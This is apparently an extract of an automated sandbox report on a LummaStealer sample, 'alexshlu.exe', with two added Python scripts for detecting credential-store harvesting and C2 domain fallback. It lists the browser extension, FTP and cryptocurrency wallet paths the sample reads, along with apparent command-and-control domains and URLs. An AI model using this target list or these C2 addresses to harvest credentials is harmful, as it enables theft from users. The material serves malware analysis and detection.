                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaa
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\alexshlu.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: Yara matchFile source: 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR
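The "File opened" entries above show the stealer's harvesting pass: one process reading Chrome extension-settings stores, FTP client configurations and a dozen desktop wallet directories belonging to unrelated products. A browser or a wallet touches only its own store, so the strong signal is a single non-owner process touching several store families. The following is an added detection example (not part of the sandbox report and not Joe Sandbox code) that scores file-open events by how many store families a process reaches. The log line format, the family regexes built from the paths in the report, the owner allow-list and the threshold are all assumptions; the sample events are constructed for the example.

```python
import re
from collections import defaultdict

# Families of credential/wallet stores. Assumption: a curated list derived from
# the "File opened" directories in the report; extend it for your environment.
STORE_FAMILIES = {
    "chrome_extension_settings": re.compile(r"\\(Local|Sync) Extension Settings\\", re.I),
    "exodus": re.compile(r"\\Roaming\\Exodus\\", re.I),
    "ledger_live": re.compile(r"\\Roaming\\Ledger Live", re.I),
    "atomic": re.compile(r"\\Roaming\\atomic\\", re.I),
    "coinomi": re.compile(r"\\Coinomi\\Coinomi\\wallets", re.I),
    "bitcoin_core": re.compile(r"\\Roaming\\Bitcoin\\wallets", re.I),
    "binance": re.compile(r"\\Roaming\\Binance", re.I),
    "jaxx": re.compile(r"\\Roaming\\com\.liberty\.jaxx\\", re.I),
    "electrum": re.compile(r"\\Roaming\\Electrum(-LTC)?\\wallets", re.I),
    "guarda": re.compile(r"\\Roaming\\Guarda\\", re.I),
    "ftp_client": re.compile(r"\\(FTPInfo|FTPGetter|FTPbox|FTPRush|SmartFTP|3D-FTP)\b", re.I),
}

# Processes allowed to read one family because they own it (assumption: kept
# in sync with the software inventory).
OWNER_OF_FAMILY = {
    "chrome.exe": {"chrome_extension_settings"},
    "exodus.exe": {"exodus"},
}

# Assumed event format: "<timestamp> pid=<n> image=<exe> path=<full path>"
EVENT_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) image=(?P<image>\S+) path=(?P<path>.+)$")


def classify(path):
    """Return the store family a path belongs to, or None if it is not a store."""
    for family, rx in STORE_FAMILIES.items():
        if rx.search(path):
            return family
    return None


def parse_events(lines):
    """Parse log lines into (ts, pid, image, path); malformed lines are skipped."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["ts"], int(m["pid"]), m["image"], m["path"]))
    return events


def find_harvesters(lines, min_families=3):
    """Flag processes that read at least min_families store families they do not own."""
    touched = defaultdict(set)  # (pid, image) -> families reached
    for _ts, pid, image, path in parse_events(lines):
        family = classify(path)
        if family is not None:
            touched[(pid, image)].add(family)
    alerts = []
    for (pid, image), families in touched.items():
        foreign = families - OWNER_OF_FAMILY.get(image.lower(), set())
        if len(foreign) >= min_families:
            alerts.append({"pid": pid, "image": image, "families": sorted(foreign)})
    return sorted(alerts, key=lambda a: a["pid"])


# Constructed sample events (not from the report's telemetry). The paths for
# pid 7720 mirror directories the sandbox saw the sample open.
SAMPLE_EVENTS = [
    r"2024-12-18T10:00:01 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    r"2024-12-18T10:00:01 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Roaming\FTPRush",
    r"2024-12-18T10:00:02 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
    r"2024-12-18T10:00:02 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Roaming\Ledger Live",
    r"2024-12-18T10:00:02 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Roaming\Electrum\wallets",
    r"2024-12-18T10:00:03 pid=7720 image=alexshlu.exe path=C:\Users\user\AppData\Roaming\Guarda\IndexedDB",
    r"2024-12-18T10:00:03 pid=7720 image=alexshlu.exe path=C:\Users\user\Documents\notes.txt",
    r"2024-12-18T10:00:04 pid=4242 image=chrome.exe path=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    r"2024-12-18T10:00:04 pid=4242 image=chrome.exe path=C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai",
    r"2024-12-18T10:00:05 pid=5120 image=exodus.exe path=C:\Users\user\AppData\Roaming\Exodus\exodus.wallet",
]

if __name__ == "__main__":
    for alert in find_harvesters(SAMPLE_EVENTS):
        print(alert)
```

Counting distinct families rather than raw file opens keeps a browser that legitimately walks all of its own extension directories below the threshold, while a process that reaches both browser stores and wallet directories trips it after a handful of events.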

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques prefixed with a number are those to which the report mapped signatures (the number is the signature-count badge as extracted); unprefixed entries are the matrix's empty placeholder cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 System Time Discovery; 141 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Process Discovery; 11 File and Directory Discovery; 33 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Screen Capture; 1 Archive Collected Data; 41 Data from Local System; 2 Clipboard Data; Keylogging; GUI Input Capture
Command and Control: 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus Detection (submitted file)

Source | Detection | Scanner | Label
alexshlu.exe | 74% | ReversingLabs | Win32.Trojan.LummaStealer
alexshlu.exe | 75% | Virustotal |
alexshlu.exe | 100% | Joe Sandbox ML |

Dropped files, unpacked PE files and memory dumps: No Antivirus matches
Antivirus Detection (URLs)

Source | Detection | Scanner | Label
https://lev-tolstoi.com/s | 0% | Avira URL Cloud | safe
https://steambroadcast-test.akamaized | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/p | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/V | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/t | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/pid | 0% | Avira URL Cloud | safe
https://store.steampower | 0% | Avira URL Cloud | safe
https://impend-differ.biz:443/apiG | 100% | Avira URL Cloud | malware
https://lev-tolstoi.com:443/apirofiles/76561199724331900 | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/ | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/lB | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/Def4 | 0% | Avira URL Cloud | safe
https://www.google.comHI2 | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com:443/apil | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/apir | 0% | Avira URL Cloud | safe
https://lev-tolstoi.com/api | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
dare-curbys.biz | unknown | unknown | false | | high
impend-differ.biz | unknown | unknown | false | | high
se-blurry.biz | unknown | unknown | false | | high
zinc-sneark.biz | unknown | unknown | false | | high
print-vexer.biz | unknown | unknown | false | | high
dwell-exclaim.biz | unknown | unknown | false | | high
covery-mover.biz | unknown | unknown | false | | high
formy-spill.biz | unknown | unknown | false | | high
drive-connect.cyou | unknown | unknown | false | | high
Contacted URLs and Domains

Name | Malicious | Antivirus Detection | Reputation
dare-curbys.biz | false | | high
formy-spill.biz | false | | high
https://steamcommunity.com/profiles/76561199724331900 | false | | high
https://lev-tolstoi.com/api | true | Avira URL Cloud: safe | unknown
print-vexer.biz | false | | high
impend-differ.biz | false | | high
dwell-exclaim.biz | false | | high
zinc-sneark.biz | false | | high
se-blurry.biz | false | | high
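The domain table above shows the C2 selection pattern visible in this run: ten candidate domains, of which only lev-tolstoi.com resolved and received the /api traffic the report marks malicious, while the other nine returned no address. A host that fails to resolve several distinct, unrelated names in a short window and then reaches one that does resolve is a cheap network-side signal for this kind of fallback list. The following is an added detection example (not part of the sandbox report and not Joe Sandbox code) over DNS resolver logs. The log format, the 60-second window and the failure threshold are assumptions; the sample lines are constructed, using the domain names from the report.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed resolver log format: "<iso timestamp> client=<ip> query=<name> rcode=<NOERROR|NXDOMAIN|...>"
LOG_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) query=(?P<qname>\S+) rcode=(?P<rcode>\S+)$")


def parse_dns(lines):
    """Parse resolver log lines into (time, client, qname, rcode); skip malformed lines."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["client"],
                           m["qname"].rstrip(".").lower(), m["rcode"].upper()))
    return events


def find_fallback_bursts(lines, min_failures=4, window=timedelta(seconds=60)):
    """Per client, flag a window with >= min_failures distinct NXDOMAIN names.

    The alert records the failed names and every name that did resolve inside
    the same window, which is the candidate that won the fallback race.
    """
    by_client = defaultdict(list)
    for ev in parse_dns(lines):
        by_client[ev[1]].append(ev)
    alerts = []
    for client, events in by_client.items():
        events.sort()
        for i, (t0, _c, _q, _r) in enumerate(events):
            failed, resolved = [], []
            for t, _c2, qname, rcode in events[i:]:
                if t - t0 > window:
                    break
                if rcode == "NXDOMAIN" and qname not in failed:
                    failed.append(qname)
                elif rcode == "NOERROR" and qname not in resolved:
                    resolved.append(qname)
            if len(failed) >= min_failures:
                alerts.append({"client": client, "start": t0.isoformat(),
                               "failed": failed, "resolved_after": resolved})
                break  # one alert per client per pass
    return alerts


# Constructed sample log (not real telemetry); names taken from the report's domain table.
SAMPLE_DNS = [
    "2024-12-18T10:00:00 client=10.0.0.5 query=dare-curbys.biz rcode=NXDOMAIN",
    "2024-12-18T10:00:02 client=10.0.0.5 query=impend-differ.biz rcode=NXDOMAIN",
    "2024-12-18T10:00:04 client=10.0.0.5 query=se-blurry.biz rcode=NXDOMAIN",
    "2024-12-18T10:00:06 client=10.0.0.5 query=zinc-sneark.biz rcode=NXDOMAIN",
    "2024-12-18T10:00:08 client=10.0.0.5 query=print-vexer.biz rcode=NXDOMAIN",
    "2024-12-18T10:00:10 client=10.0.0.5 query=lev-tolstoi.com rcode=NOERROR",
    "2024-12-18T10:00:12 client=10.0.0.5 query=steamcommunity.com rcode=NOERROR",
    "2024-12-18T10:00:03 client=10.0.0.9 query=www.google.com rcode=NOERROR",
    "2024-12-18T10:00:05 client=10.0.0.9 query=wwww.google.com rcode=NXDOMAIN",
]

if __name__ == "__main__":
    for alert in find_fallback_bursts(SAMPLE_DNS):
        print(alert)
```

The threshold matters: a single typo produces one NXDOMAIN, and browsers prefetching dead links produce a few, but five unrelated registrable domains failing within seconds from one client, immediately followed by a successful lookup that carries the HTTPS traffic, is the shape to hunt for. Pair the alert with the resolved name so an analyst can pivot straight to the live C2.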
URLs Found in Memory or Binary Data

Name | Source | Malicious | Antivirus Detection | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://player.vimeo.com | alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://impend-differ.biz:443/apiG | alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/?subsection=broadcasts | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/s | alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/t | alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/p | alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com:443/apirofiles/76561199724331900 | alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://lev-tolstoi.com/pid | alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/subscriber_agreement/ | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.gstatic.cn/recaptcha/ | alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com | alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.valvesoftware.com/legal.htm | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.youtube.com | alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com | alexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://lev-tolstoi.com/V | alexshlu.exe, 00000003.00000003.1566499770.00000000034F1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ | alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s.ytimg.com; | alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxx | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steambroadcast-test.akamaized | alexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
